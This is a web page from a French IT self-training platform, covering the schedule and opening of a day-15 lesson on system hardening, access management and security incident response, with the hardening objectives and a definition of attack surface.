
<!doctype html>
<html lang="fr" class="no-js">
  <head>
    
      <meta charset="utf-8">
      <meta name="viewport" content="width=device-width,initial-scale=1">
      
      
      
        <link rel="canonical" href="https://adolphechris.github.io/Paradis-formation-it/tome-p3a/jour-15/">
      
      
      
      
        
      
      
      <link rel="icon" href="../../assets/images/favicon.png">
      <meta name="generator" content="mkdocs-1.6.1, mkdocs-material-9.7.7">
    
    
      
        <title>TOME P3-A — Jour 15 (14h) - PARADIS — Plateforme d'Autoformation IT</title>
      
    
    
      <link rel="stylesheet" href="../../assets/stylesheets/main.ec1eaa64.min.css">
      
        
        <link rel="stylesheet" href="../../assets/stylesheets/palette.ab4e12ef.min.css">
      
      


    
    
      
    
    
      
        
        
        <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
        <link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Inter:300,300i,400,400i,700,700i%7CJetBrains+Mono:400,400i,700,700i&display=fallback">
        <style>:root{--md-text-font:"Inter";--md-code-font:"JetBrains Mono"}</style>
      
    
    
      <link rel="stylesheet" href="../../css/style.css">
    
    <script>__md_scope=new URL("../..",location),__md_hash=e=>[...e].reduce(((e,_)=>(e<<5)-e+_.charCodeAt(0)),0),__md_get=(e,_=localStorage,t=__md_scope)=>JSON.parse(_.getItem(t.pathname+"."+e)),__md_set=(e,_,t=localStorage,a=__md_scope)=>{try{t.setItem(a.pathname+"."+e,JSON.stringify(_))}catch(e){}}</script>
    
      
  


    
    
  </head>
  
  
    
    
      
    
    
    
    
    <body dir="ltr" data-md-color-scheme="default" data-md-color-primary="#0B5FFF" data-md-color-accent="#2EC4B6">
  
    
    <input class="md-toggle" data-md-toggle="drawer" type="checkbox" id="__drawer" autocomplete="off">
    <input class="md-toggle" data-md-toggle="search" type="checkbox" id="__search" autocomplete="off">
    <label class="md-overlay" for="__drawer"></label>
    <div data-md-component="skip">
      
        
        <a href="#tome-p3-a-jour-15-14h" class="md-skip">
          Aller au contenu
        </a>
      
    </div>
    <div data-md-component="announce">
      
    </div>
    
    
      

<header class="md-header" data-md-component="header">
  <nav class="md-header__inner md-grid" aria-label="En-tête">
    <a href="../.." title="PARADIS — Plateforme d&#39;Autoformation IT" class="md-header__button md-logo" aria-label="PARADIS — Plateforme d'Autoformation IT" data-md-component="logo">
      
  
  <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M12 8a3 3 0 0 0 3-3 3 3 0 0 0-3-3 3 3 0 0 0-3 3 3 3 0 0 0 3 3m0 3.54C9.64 9.35 6.5 8 3 8v11c3.5 0 6.64 1.35 9 3.54 2.36-2.19 5.5-3.54 9-3.54V8c-3.5 0-6.64 1.35-9 3.54"/></svg>

    </a>
    <label class="md-header__button md-icon" for="__drawer">
      
      <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M3 6h18v2H3zm0 5h18v2H3zm0 5h18v2H3z"/></svg>
    </label>
    <div class="md-header__title" data-md-component="header-title">
      <div class="md-header__ellipsis">
        <div class="md-header__topic">
          <span class="md-ellipsis">
            PARADIS — Plateforme d'Autoformation IT
          </span>
        </div>
        <div class="md-header__topic" data-md-component="header-topic">
          <span class="md-ellipsis">
            
              TOME P3-A — Jour 15 (14h)
            
          </span>
        </div>
      </div>
    </div>
    
      
        <form class="md-header__option" data-md-component="palette">
  
    
    
    
    <input class="md-option" data-md-color-media="(prefers-color-scheme: light)" data-md-color-scheme="default" data-md-color-primary="#0B5FFF" data-md-color-accent="#2EC4B6"  aria-hidden="true"  type="radio" name="__palette" id="__palette_0">
    
  
    
    
    
    <input class="md-option" data-md-color-media="(prefers-color-scheme: dark)" data-md-color-scheme="slate" data-md-color-primary="#0B5FFF" data-md-color-accent="#2EC4B6"  aria-hidden="true"  type="radio" name="__palette" id="__palette_1">
    
  
</form>
      
    
    
      <script>var palette=__md_get("__palette");if(palette&&palette.color){if("(prefers-color-scheme)"===palette.color.media){var media=matchMedia("(prefers-color-scheme: light)"),input=document.querySelector(media.matches?"[data-md-color-media='(prefers-color-scheme: light)']":"[data-md-color-media='(prefers-color-scheme: dark)']");palette.color.media=input.getAttribute("data-md-color-media"),palette.color.scheme=input.getAttribute("data-md-color-scheme"),palette.color.primary=input.getAttribute("data-md-color-primary"),palette.color.accent=input.getAttribute("data-md-color-accent")}for(var[key,value]of Object.entries(palette.color))document.body.setAttribute("data-md-color-"+key,value)}</script>
    
    
    
      
      
        <label class="md-header__button md-icon" for="__search">
          
          <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M9.5 3A6.5 6.5 0 0 1 16 9.5c0 1.61-.59 3.09-1.56 4.23l.27.27h.79l5 5-1.5 1.5-5-5v-.79l-.27-.27A6.52 6.52 0 0 1 9.5 16 6.5 6.5 0 0 1 3 9.5 6.5 6.5 0 0 1 9.5 3m0 2C7 5 5 7 5 9.5S7 14 9.5 14 14 12 14 9.5 12 5 9.5 5"/></svg>
        </label>
        <div class="md-search" data-md-component="search" role="dialog">
  <label class="md-search__overlay" for="__search"></label>
  <div class="md-search__inner" role="search">
    <form class="md-search__form" name="search">
      <input type="text" class="md-search__input" name="query" aria-label="Rechercher" placeholder="Rechercher" autocapitalize="off" autocorrect="off" autocomplete="off" spellcheck="false" data-md-component="search-query" required>
      <label class="md-search__icon md-icon" for="__search">
        
        <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M9.5 3A6.5 6.5 0 0 1 16 9.5c0 1.61-.59 3.09-1.56 4.23l.27.27h.79l5 5-1.5 1.5-5-5v-.79l-.27-.27A6.52 6.52 0 0 1 9.5 16 6.5 6.5 0 0 1 3 9.5 6.5 6.5 0 0 1 9.5 3m0 2C7 5 5 7 5 9.5S7 14 9.5 14 14 12 14 9.5 12 5 9.5 5"/></svg>
        
        <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M20 11v2H8l5.5 5.5-1.42 1.42L4.16 12l7.92-7.92L13.5 5.5 8 11z"/></svg>
      </label>
      <nav class="md-search__options" aria-label="Recherche">
        
        <button type="reset" class="md-search__icon md-icon" title="Effacer" aria-label="Effacer" tabindex="-1">
          
          <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M19 6.41 17.59 5 12 10.59 6.41 5 5 6.41 10.59 12 5 17.59 6.41 19 12 13.41 17.59 19 19 17.59 13.41 12z"/></svg>
        </button>
      </nav>
      
        <div class="md-search__suggest" data-md-component="search-suggest"></div>
      
    </form>
    <div class="md-search__output">
      <div class="md-search__scrollwrap" tabindex="0" data-md-scrollfix>
        <div class="md-search-result" data-md-component="search-result">
          <div class="md-search-result__meta">
            Initialisation de la recherche
          </div>
          <ol class="md-search-result__list" role="presentation"></ol>
        </div>
      </div>
    </div>
  </div>
</div>
      
    
    
      <div class="md-header__source">
        <a href="https://github.com/Adolphechris/Paradis-formation-it" title="Aller au dépôt" class="md-source" data-md-component="source">
  <div class="md-source__icon md-icon">
    
    <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 448 512"><!--! Font Awesome Free 7.1.0 by @fontawesome - https://fontawesome.com License - https://fontawesome.com/license/free (Icons: CC BY 4.0, Fonts: SIL OFL 1.1, Code: MIT License) Copyright 2025 Fonticons, Inc.--><path d="M439.6 236.1 244 40.5c-5.4-5.5-12.8-8.5-20.4-8.5s-15 3-20.4 8.4L162.5 81l51.5 51.5c27.1-9.1 52.7 16.8 43.4 43.7l49.7 49.7c34.2-11.8 61.2 31 35.5 56.7-26.5 26.5-70.2-2.9-56-37.3L240.3 199v121.9c25.3 12.5 22.3 41.8 9.1 55-6.4 6.4-15.2 10.1-24.3 10.1s-17.8-3.6-24.3-10.1c-17.6-17.6-11.1-46.9 11.2-56v-123c-20.8-8.5-24.6-30.7-18.6-45L142.6 101 8.5 235.1C3 240.6 0 247.9 0 255.5s3 15 8.5 20.4l195.6 195.7c5.4 5.4 12.7 8.4 20.4 8.4s15-3 20.4-8.4l194.7-194.7c5.4-5.4 8.4-12.8 8.4-20.4s-3-15-8.4-20.4"/></svg>
  </div>
  <div class="md-source__repository">
    Adolphechris/Paradis-formation-it
  </div>
</a>
      </div>
    
  </nav>
  
</header>
    
    <div class="md-container" data-md-component="container">
      
      
        
          
            
<nav class="md-tabs" aria-label="Onglets" data-md-component="tabs">
  <div class="md-grid">
    <ul class="md-tabs__list">
      
        
  
  
  
  
    <li class="md-tabs__item">
      <a href="../.." class="md-tabs__link">
        
  
  
    
  
  Accueil

      </a>
    </li>
  

      
        
  
  
  
  
    <li class="md-tabs__item">
      <a href="../../apercu/" class="md-tabs__link">
        
  
  
    
  
  Aperçu du programme

      </a>
    </li>
  

      
        
  
  
  
  
    <li class="md-tabs__item">
      <a href="../../feuille-de-route/" class="md-tabs__link">
        
  
  
    
  
  Feuille de route

      </a>
    </li>
  

      
        
  
  
  
  
    <li class="md-tabs__item">
      <a href="../../table-des-matieres/" class="md-tabs__link">
        
  
  
    
  
  Table des matières (45 jours)

      </a>
    </li>
  

      
        
  
  
  
  
    <li class="md-tabs__item">
      <a href="../../tome-p0/" class="md-tabs__link">
        
  
  
    
  
  Tome P0 — Socle Support

      </a>
    </li>
  

      
        
  
  
  
  
    <li class="md-tabs__item">
      <a href="../../tome-p2/" class="md-tabs__link">
        
  
  
    
  
  Tome P2 — Fondations

      </a>
    </li>
  

      
        
  
  
  
  
    <li class="md-tabs__item">
      <a href="../" class="md-tabs__link">
        
  
  
    
  
  Tome P3A — Administration Système

      </a>
    </li>
  

      
        
  
  
  
  
    <li class="md-tabs__item">
      <a href="../../tome-p3b/" class="md-tabs__link">
        
  
  
    
  
  Tome P3B — Base de Données & Analytique

      </a>
    </li>
  

      
        
  
  
  
  
    <li class="md-tabs__item">
      <a href="../../tome-p3c/" class="md-tabs__link">
        
  
  
    
  
  Tome P3C — Développement Web

      </a>
    </li>
  

      
        
  
  
  
  
    <li class="md-tabs__item">
      <a href="../../tome-p4/" class="md-tabs__link">
        
  
  
    
  
  Tome P4 — Cloud & Sécurité

      </a>
    </li>
  

      
        
  
  
  
  
    <li class="md-tabs__item">
      <a href="../../tome-p5/" class="md-tabs__link">
        
  
  
    
  
  Tome P5 — Préparation Tests

      </a>
    </li>
  

      
        
  
  
  
  
    <li class="md-tabs__item">
      <a href="../../tome-p6/" class="md-tabs__link">
        
  
  
    
  
  Tome P6 — Portfolio & Soutenance

      </a>
    </li>
  

      
        
  
  
  
  
    <li class="md-tabs__item">
      <a href="../../qcm/" class="md-tabs__link">
        
  
  
    
  
  Exercices et QCM

      </a>
    </li>
  

      
        
  
  
  
  
    <li class="md-tabs__item">
      <a href="../../examen-blanc/" class="md-tabs__link">
        
  
  
    
  
  Examen Blanc BCC

      </a>
    </li>
  

      
        
  
  
  
  
    <li class="md-tabs__item">
      <a href="../../portfolio/" class="md-tabs__link">
        
  
  
    
  
  Portfolio & Employabilité

      </a>
    </li>
  

      
        
  
  
  
  
    <li class="md-tabs__item">
      <a href="../../radar/" class="md-tabs__link">
        
  
  
    
  
  Radar de Compétences

      </a>
    </li>
  

      
        
  
  
  
  
    <li class="md-tabs__item">
      <a href="../../annexes/" class="md-tabs__link">
        
  
  
    
  
  Annexe — Abréviations

      </a>
    </li>
  

      
        
  
  
  
  
    <li class="md-tabs__item">
      <a href="../../tuteur-ia/" class="md-tabs__link">
        
  
  
    
  
  Tuteur IA

      </a>
    </li>
  

      
    </ul>
  </div>
</nav>
          
        
      
      <main class="md-main" data-md-component="main">
        <div class="md-main__inner md-grid">
          
            
              
              <div class="md-sidebar md-sidebar--primary" data-md-component="sidebar" data-md-type="navigation" >
                <div class="md-sidebar__scrollwrap">
                  <div class="md-sidebar__inner">
                    


  


<nav class="md-nav md-nav--primary md-nav--lifted" aria-label="Navigation" data-md-level="0">
  <label class="md-nav__title" for="__drawer">
    <a href="../.." title="PARADIS — Plateforme d&#39;Autoformation IT" class="md-nav__button md-logo" aria-label="PARADIS — Plateforme d'Autoformation IT" data-md-component="logo">
      
  
  <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M12 8a3 3 0 0 0 3-3 3 3 0 0 0-3-3 3 3 0 0 0-3 3 3 3 0 0 0 3 3m0 3.54C9.64 9.35 6.5 8 3 8v11c3.5 0 6.64 1.35 9 3.54 2.36-2.19 5.5-3.54 9-3.54V8c-3.5 0-6.64 1.35-9 3.54"/></svg>

    </a>
    PARADIS — Plateforme d'Autoformation IT
  </label>
  
    <div class="md-nav__source">
      <a href="https://github.com/Adolphechris/Paradis-formation-it" title="Aller au dépôt" class="md-source" data-md-component="source">
  <div class="md-source__icon md-icon">
    
    <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 448 512"><!--! Font Awesome Free 7.1.0 by @fontawesome - https://fontawesome.com License - https://fontawesome.com/license/free (Icons: CC BY 4.0, Fonts: SIL OFL 1.1, Code: MIT License) Copyright 2025 Fonticons, Inc.--><path d="M439.6 236.1 244 40.5c-5.4-5.5-12.8-8.5-20.4-8.5s-15 3-20.4 8.4L162.5 81l51.5 51.5c27.1-9.1 52.7 16.8 43.4 43.7l49.7 49.7c34.2-11.8 61.2 31 35.5 56.7-26.5 26.5-70.2-2.9-56-37.3L240.3 199v121.9c25.3 12.5 22.3 41.8 9.1 55-6.4 6.4-15.2 10.1-24.3 10.1s-17.8-3.6-24.3-10.1c-17.6-17.6-11.1-46.9 11.2-56v-123c-20.8-8.5-24.6-30.7-18.6-45L142.6 101 8.5 235.1C3 240.6 0 247.9 0 255.5s3 15 8.5 20.4l195.6 195.7c5.4 5.4 12.7 8.4 20.4 8.4s15-3 20.4-8.4l194.7-194.7c5.4-5.4 8.4-12.8 8.4-20.4s-3-15-8.4-20.4"/></svg>
  </div>
  <div class="md-source__repository">
    Adolphechris/Paradis-formation-it
  </div>
</a>
    </div>
  
  <ul class="md-nav__list" data-md-scrollfix>
    
      
      
  
  
  
  
    <li class="md-nav__item">
      <a href="../.." class="md-nav__link">
        
  
  
  <span class="md-ellipsis">
    
  
    Accueil
  

    
  </span>
  
  

      </a>
    </li>
  

    
      
      
  
  
  
  
    <li class="md-nav__item">
      <a href="../../apercu/" class="md-nav__link">
        
  
  
  <span class="md-ellipsis">
    
  
    Aperçu du programme
  

    
  </span>
  
  

      </a>
    </li>
  

    
      
      
  
  
  
  
    <li class="md-nav__item">
      <a href="../../feuille-de-route/" class="md-nav__link">
        
  
  
  <span class="md-ellipsis">
    
  
    Feuille de route
  

    
  </span>
  
  

      </a>
    </li>
  

    
      
      
  
  
  
  
    <li class="md-nav__item">
      <a href="../../table-des-matieres/" class="md-nav__link">
        
  
  
  <span class="md-ellipsis">
    
  
    Table des matières (45 jours)
  

    
  </span>
  
  

      </a>
    </li>
  

    
      
      
  
  
  
  
    <li class="md-nav__item">
      <a href="../../tome-p0/" class="md-nav__link">
        
  
  
  <span class="md-ellipsis">
    
  
    Tome P0 — Socle Support
  

    
  </span>
  
  

      </a>
    </li>
  

    
      
      
  
  
  
  
    <li class="md-nav__item">
      <a href="../../tome-p2/" class="md-nav__link">
        
  
  
  <span class="md-ellipsis">
    
  
    Tome P2 — Fondations
  

    
  </span>
  
  

      </a>
    </li>
  

    
      
      
  
  
  
  
    <li class="md-nav__item">
      <a href="../" class="md-nav__link">
        
  
  
  <span class="md-ellipsis">
    
  
    Tome P3A — Administration Système
  

    
  </span>
  
  

      </a>
    </li>
  

    
      
      
  
  
  
  
    <li class="md-nav__item">
      <a href="../../tome-p3b/" class="md-nav__link">
        
  
  
  <span class="md-ellipsis">
    
  
    Tome P3B — Base de Données & Analytique
  

    
  </span>
  
  

      </a>
    </li>
  

    
      
      
  
  
  
  
    <li class="md-nav__item">
      <a href="../../tome-p3c/" class="md-nav__link">
        
  
  
  <span class="md-ellipsis">
    
  
    Tome P3C — Développement Web
  

    
  </span>
  
  

      </a>
    </li>
  

    
      
      
  
  
  
  
    <li class="md-nav__item">
      <a href="../../tome-p4/" class="md-nav__link">
        
  
  
  <span class="md-ellipsis">
    
  
    Tome P4 — Cloud & Sécurité
  

    
  </span>
  
  

      </a>
    </li>
  

    
      
      
  
  
  
  
    <li class="md-nav__item">
      <a href="../../tome-p5/" class="md-nav__link">
        
  
  
  <span class="md-ellipsis">
    
  
    Tome P5 — Préparation Tests
  

    
  </span>
  
  

      </a>
    </li>
  

    
      
      
  
  
  
  
    <li class="md-nav__item">
      <a href="../../tome-p6/" class="md-nav__link">
        
  
  
  <span class="md-ellipsis">
    
  
    Tome P6 — Portfolio & Soutenance
  

    
  </span>
  
  

      </a>
    </li>
  

    
      
      
  
  
  
  
    <li class="md-nav__item">
      <a href="../../qcm/" class="md-nav__link">
        
  
  
  <span class="md-ellipsis">
    
  
    Exercices et QCM
  

    
  </span>
  
  

      </a>
    </li>
  

    
      
      
  
  
  
  
    <li class="md-nav__item">
      <a href="../../examen-blanc/" class="md-nav__link">
        
  
  
  <span class="md-ellipsis">
    
  
    Examen Blanc BCC
  

    
  </span>
  
  

      </a>
    </li>
  

    
      
      
  
  
  
  
    <li class="md-nav__item">
      <a href="../../portfolio/" class="md-nav__link">
        
  
  
  <span class="md-ellipsis">
    
  
    Portfolio & Employabilité
  

    
  </span>
  
  

      </a>
    </li>
  

    
      
      
  
  
  
  
    <li class="md-nav__item">
      <a href="../../radar/" class="md-nav__link">
        
  
  
  <span class="md-ellipsis">
    
  
    Radar de Compétences
  

    
  </span>
  
  

      </a>
    </li>
  

    
      
      
  
  
  
  
    <li class="md-nav__item">
      <a href="../../annexes/" class="md-nav__link">
        
  
  
  <span class="md-ellipsis">
    
  
    Annexe — Abréviations
  

    
  </span>
  
  

      </a>
    </li>
  

    
      
      
  
  
  
  
    <li class="md-nav__item">
      <a href="../../tuteur-ia/" class="md-nav__link">
        
  
  
  <span class="md-ellipsis">
    
  
    Tuteur IA
  

    
  </span>
  
  

      </a>
    </li>
  

    
  </ul>
</nav>
                  </div>
                </div>
              </div>
            
            
              
              <div class="md-sidebar md-sidebar--secondary" data-md-component="sidebar" data-md-type="toc" >
                <div class="md-sidebar__scrollwrap">
                  <div class="md-sidebar__inner">
                    

<nav class="md-nav md-nav--secondary" aria-label="Table des matières">
  
  
  
    
  
  
    <label class="md-nav__title" for="__toc">
      <span class="md-nav__icon md-icon"></span>
      Table des matières
    </label>
    <ul class="md-nav__list" data-md-component="toc" data-md-scrollfix>
      
        <li class="md-nav__item">
  <a href="#decoupage-horaire-operationnel-j15" class="md-nav__link">
    <span class="md-ellipsis">
      
        Découpage horaire opérationnel J15
      
    </span>
  </a>
  
</li>
      
        <li class="md-nav__item">
  <a href="#1-durcissement-systemes-4h" class="md-nav__link">
    <span class="md-ellipsis">
      
        1) Durcissement systèmes (4h)
      
    </span>
  </a>
  
    <nav class="md-nav" aria-label="1) Durcissement systèmes (4h)">
      <ul class="md-nav__list">
        
          <li class="md-nav__item">
  <a href="#objectifs-dapprentissage" class="md-nav__link">
    <span class="md-ellipsis">
      
        Objectifs d'apprentissage
      
    </span>
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#contenu-pedagogique" class="md-nav__link">
    <span class="md-ellipsis">
      
        Contenu pédagogique
      
    </span>
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#exercices-pratiques-avec-corriges" class="md-nav__link">
    <span class="md-ellipsis">
      
        Exercices pratiques (avec corrigés)
      
    </span>
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#nouvelles-abreviations-rencontrees" class="md-nav__link">
    <span class="md-ellipsis">
      
        Nouvelles abréviations rencontrées
      
    </span>
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#banque-de-questions-du-module-15" class="md-nav__link">
    <span class="md-ellipsis">
      
        Banque de questions du module (15)
      
    </span>
  </a>
  
</li>
        
      </ul>
    </nav>
  
</li>
      
        <li class="md-nav__item">
  <a href="#2-gestion-des-acces-et-authentification-4h" class="md-nav__link">
    <span class="md-ellipsis">
      
        2) Gestion des accès et authentification (4h)
      
    </span>
  </a>
  
    <nav class="md-nav" aria-label="2) Gestion des accès et authentification (4h)">
      <ul class="md-nav__list">
        
          <li class="md-nav__item">
  <a href="#objectifs-dapprentissage_1" class="md-nav__link">
    <span class="md-ellipsis">
      
        Objectifs d'apprentissage
      
    </span>
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#contenu-pedagogique_1" class="md-nav__link">
    <span class="md-ellipsis">
      
        Contenu pédagogique
      
    </span>
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#exercices-pratiques-avec-corriges_1" class="md-nav__link">
    <span class="md-ellipsis">
      
        Exercices pratiques (avec corrigés)
      
    </span>
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#nouvelles-abreviations-rencontrees_1" class="md-nav__link">
    <span class="md-ellipsis">
      
        Nouvelles abréviations rencontrées
      
    </span>
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#banque-de-questions-du-module-15_1" class="md-nav__link">
    <span class="md-ellipsis">
      
        Banque de questions du module (15)
      
    </span>
  </a>
  
</li>
        
      </ul>
    </nav>
  
</li>
      
        <li class="md-nav__item">
  <a href="#3-detection-et-reponse-aux-incidents-de-securite-3h" class="md-nav__link">
    <span class="md-ellipsis">
      
        3) Détection et réponse aux incidents de sécurité (3h)
      
    </span>
  </a>
  
    <nav class="md-nav" aria-label="3) Détection et réponse aux incidents de sécurité (3h)">
      <ul class="md-nav__list">
        
          <li class="md-nav__item">
  <a href="#objectifs-dapprentissage_2" class="md-nav__link">
    <span class="md-ellipsis">
      
        Objectifs d'apprentissage
      
    </span>
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#contenu-pedagogique_2" class="md-nav__link">
    <span class="md-ellipsis">
      
        Contenu pédagogique
      
    </span>
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#exercices-pratiques-avec-corriges_2" class="md-nav__link">
    <span class="md-ellipsis">
      
        Exercices pratiques (avec corrigés)
      
    </span>
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#nouvelles-abreviations-rencontrees_2" class="md-nav__link">
    <span class="md-ellipsis">
      
        Nouvelles abréviations rencontrées
      
    </span>
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#banque-de-questions-du-module-15_2" class="md-nav__link">
    <span class="md-ellipsis">
      
        Banque de questions du module (15)
      
    </span>
  </a>
  
</li>
        
      </ul>
    </nav>
  
</li>
      
        <li class="md-nav__item">
  <a href="#4-labs-incidents-securite-scenarios-realistes-2h" class="md-nav__link">
    <span class="md-ellipsis">
      
        4) Labs incidents sécurité — scénarios réalistes (2h)
      
    </span>
  </a>
  
    <nav class="md-nav" aria-label="4) Labs incidents sécurité — scénarios réalistes (2h)">
      <ul class="md-nav__list">
        
          <li class="md-nav__item">
  <a href="#objectifs-dapprentissage_3" class="md-nav__link">
    <span class="md-ellipsis">
      
        Objectifs d'apprentissage
      
    </span>
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#contenu-pedagogique_3" class="md-nav__link">
    <span class="md-ellipsis">
      
        Contenu pédagogique
      
    </span>
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#exercices-pratiques-avec-corriges_3" class="md-nav__link">
    <span class="md-ellipsis">
      
        Exercices pratiques (avec corrigés)
      
    </span>
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#nouvelles-abreviations-rencontrees_3" class="md-nav__link">
    <span class="md-ellipsis">
      
        Nouvelles abréviations rencontrées
      
    </span>
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#banque-de-questions-du-module-15_3" class="md-nav__link">
    <span class="md-ellipsis">
      
        Banque de questions du module (15)
      
    </span>
  </a>
  
</li>
        
      </ul>
    </nav>
  
</li>
      
        <li class="md-nav__item">
  <a href="#5-banque-de-questions-suivi-p1-1h" class="md-nav__link">
    <span class="md-ellipsis">
      
        5) Banque de questions + suivi P1 (1h)
      
    </span>
  </a>
  
    <nav class="md-nav" aria-label="5) Banque de questions + suivi P1 (1h)">
      <ul class="md-nav__list">
        
          <li class="md-nav__item">
  <a href="#objectifs-dapprentissage_4" class="md-nav__link">
    <span class="md-ellipsis">
      
        Objectifs d'apprentissage
      
    </span>
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#contenu-pedagogique_4" class="md-nav__link">
    <span class="md-ellipsis">
      
        Contenu pédagogique
      
    </span>
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#exercices-pratiques-avec-corriges_4" class="md-nav__link">
    <span class="md-ellipsis">
      
        Exercices pratiques (avec corrigés)
      
    </span>
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#nouvelles-abreviations-rencontrees_4" class="md-nav__link">
    <span class="md-ellipsis">
      
        Nouvelles abréviations rencontrées
      
    </span>
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#banque-de-questions-du-module-15_4" class="md-nav__link">
    <span class="md-ellipsis">
      
        Banque de questions du module (15)
      
    </span>
  </a>
  
</li>
        
      </ul>
    </nav>
  
</li>
      
        <li class="md-nav__item">
  <a href="#validation-qualite-j15-anti-superficiel" class="md-nav__link">
    <span class="md-ellipsis">
      
        Validation qualité J15 (anti-superficiel)
      
    </span>
  </a>
  
    <nav class="md-nav" aria-label="Validation qualité J15 (anti-superficiel)">
      <ul class="md-nav__list">
        
          <li class="md-nav__item">
  <a href="#livrables-obligatoires-fin-de-j15" class="md-nav__link">
    <span class="md-ellipsis">
      
        Livrables obligatoires fin de J15
      
    </span>
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#grille-devaluation-rapide-100-points" class="md-nav__link">
    <span class="md-ellipsis">
      
        Grille d'évaluation rapide (100 points)
      
    </span>
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#seuil-attendu" class="md-nav__link">
    <span class="md-ellipsis">
      
        Seuil attendu
      
    </span>
  </a>
  
</li>
        
      </ul>
    </nav>
  
</li>
      
        <li class="md-nav__item">
  <a href="#corriges-guides-mode-tuteur-reponses-attendues" class="md-nav__link">
    <span class="md-ellipsis">
      
        Corrigés guidés — mode tuteur (réponses attendues)
      
    </span>
  </a>
  
    <nav class="md-nav" aria-label="Corrigés guidés — mode tuteur (réponses attendues)">
      <ul class="md-nav__list">
        
          <li class="md-nav__item">
  <a href="#a-corrige-module-1-durcissement" class="md-nav__link">
    <span class="md-ellipsis">
      
        A. Corrigé — Module 1 (Durcissement)
      
    </span>
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#b-corrige-module-2-gestion-des-acces" class="md-nav__link">
    <span class="md-ellipsis">
      
        B. Corrigé — Module 2 (Gestion des accès)
      
    </span>
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#c-corrige-module-3-detection-et-reponse" class="md-nav__link">
    <span class="md-ellipsis">
      
        C. Corrigé — Module 3 (Détection et réponse)
      
    </span>
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#d-corrige-module-4-labs-incidents" class="md-nav__link">
    <span class="md-ellipsis">
      
        D. Corrigé — Module 4 (Labs incidents)
      
    </span>
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#e-corrige-module-5-banque-p1" class="md-nav__link">
    <span class="md-ellipsis">
      
        E. Corrigé — Module 5 (Banque + P1)
      
    </span>
  </a>
  
</li>
        
      </ul>
    </nav>
  
</li>
      
    </ul>
  
</nav>
                  </div>
                </div>
              </div>
            
          
          
            <div class="md-content" data-md-component="content">
              
              <article class="md-content__inner md-typeset">
                
                  


  
  


<h1 id="tome-p3-a-jour-15-14h">TOME P3-A — Jour 15 (14h)<a class="headerlink" href="#tome-p3-a-jour-15-14h" title="Permanent link">&para;</a></h1>
<h2 id="decoupage-horaire-operationnel-j15">Découpage horaire opérationnel J15<a class="headerlink" href="#decoupage-horaire-operationnel-j15" title="Permanent link">&para;</a></h2>
<ul>
<li>Durcissement systèmes (Linux + Windows) — <strong>4h</strong></li>
<li>Gestion des accès et authentification (principes, moindre privilège, MFA) — <strong>4h</strong></li>
<li>Détection et réponse aux incidents de sécurité — <strong>3h</strong></li>
<li>Labs incidents sécurité (scénarios réalistes) — <strong>2h</strong></li>
<li>Banque de questions + suivi P1 — <strong>1h</strong></li>
</ul>
<hr />
<h2 id="1-durcissement-systemes-4h">1) Durcissement systèmes (4h)<a class="headerlink" href="#1-durcissement-systemes-4h" title="Permanent link">&para;</a></h2>
<h3 id="objectifs-dapprentissage">Objectifs d'apprentissage<a class="headerlink" href="#objectifs-dapprentissage" title="Permanent link">&para;</a></h3>
<ul>
<li>Appliquer une politique de durcissement de base sur un serveur Linux et un serveur Windows.</li>
<li>Identifier et désactiver les services inutiles exposés.</li>
<li>Configurer un pare-feu hôte minimal (iptables/nftables, ufw, firewalld Linux ; Windows Defender Firewall).</li>
<li>Appliquer les mises à jour de sécurité de façon maîtrisée et documentée.</li>
<li>Expliquer le concept de surface d'attaque et comment le durcissement la réduit.</li>
</ul>
<h3 id="contenu-pedagogique">Contenu pédagogique<a class="headerlink" href="#contenu-pedagogique" title="Permanent link">&para;</a></h3>
<p>Le durcissement (hardening) consiste à réduire la surface d'attaque d'un système en supprimant tout ce qui n'est pas strictement nécessaire et en configurant ce qui reste de façon sécurisée.</p>
<p>Points clés:
1. <strong>Surface d'attaque</strong> = ensemble des points d'entrée exploitables (ports ouverts, services, comptes, applications). Plus elle est petite, plus le système est difficile à compromettre.
2. <strong>Principe de base</strong> : désactiver/désinstaller tout ce qui n'est pas utilisé. Chaque service actif est un risque potentiel.
